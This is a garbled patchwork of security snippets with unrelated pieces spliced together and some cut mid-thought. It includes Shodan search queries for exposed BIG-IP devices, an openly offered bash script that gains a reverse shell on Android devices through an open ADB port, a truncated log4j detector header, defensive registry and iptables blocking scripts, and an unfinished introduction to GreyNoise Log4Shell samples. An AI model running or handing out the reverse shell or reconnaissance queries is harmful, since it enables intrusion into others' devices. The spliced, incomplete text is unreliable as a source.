title:"Big-IP®" org:"Organization Name"
http.title:"BIG-IP®- Redirect" org:"Organization Name"
http.favicon.hash:-335242539 "3992" org:"Organization Name"
#!/bin/bash
# Simple reverse shell on an Android device using Android Debug Bridge. Ensure you run nc -lvp 4444 on another screen first.
# By Random_Robbie
adb connect "$1:5555"
adb shell sh -i >& "/dev/tcp/$2/4444" 0>&1
echo "[*] Should have a shell now ..... Be nice :) [*]"
#! /usr/bin/env python3
'''
Needs Requests (pip3 install requests)
Author: Marcello Salvati, Twitter: @byt3bl33d3r
License: DWTFUWANTWTL (Do What Ever the Fuck You Want With This License)
This should allow you to detect if something is potentially exploitable to the log4j 0day dropped on December 9th 2021. |
Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Word\Options]
"DontUpdateLinks"=dword:00000001
[HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options]
"DontUpdateLinks"=dword:00000001
#!/usr/bin/python3
import subprocess

# Source addresses to drop; the list name "shodan" is the author's label.
shodan = ["104.131.0.69", "104.236.198.48", "155.94.222.12","155.94.254.133", "155.94.254.143", "162.159.244.38", "185.181.102.18", "188.138.9.50", "198.20.69.74", "198.20.69.98", "198.20.70.114", "198.20.87.98", "198.20.99.130", "208.180.20.97", "209.126.110.38", "216.117.2.180", "66.240.192.138", "66.240.219.146", "66.240.236.119", "71.6.135.131", "71.6.146.185", "71.6.158.166", "71.6.165.200", "71.6.167.142", "82.221.105.6", "82.221.105.7", "85.25.103.50", "85.25.43.94", "93.120.27.62", "98.143.148.107", "98.143.148.135"]
for ip in shodan:
    # Append a DROP rule for this source address to the INPUT chain (requires root).
    subprocess.run(["iptables", "-A", "INPUT", "-s", ip, "-j", "DROP"], check=True)
## Get new exit node list every 6 hours
57 */6 * * * `curl https://check.torproject.org/cgi-bin/TorBulkExitList.py\?ip\=<yourip> | awk '{print $0" TOREX;"}' > /etc/nginx/includes/torexit.ips && service nginx restart`
Enclosed are some sanitized samples of data GreyNoise has identified and collected related to the Log4J vulnerability exploitation in the wild. GreyNoise infrastructure IPs have been removed while preserving the data to the best of our ability. Please note that GreyNoise HAS NOT verified if any of these are effective. These examples are not a comprehensive coverage of all the payloads GreyNoise has observed.
These samples are intended to provide individuals with a clearer idea of some of the variation in the wild.
The following section includes Log4Shell samples seen in the wild.
What appears to be a failed attempt: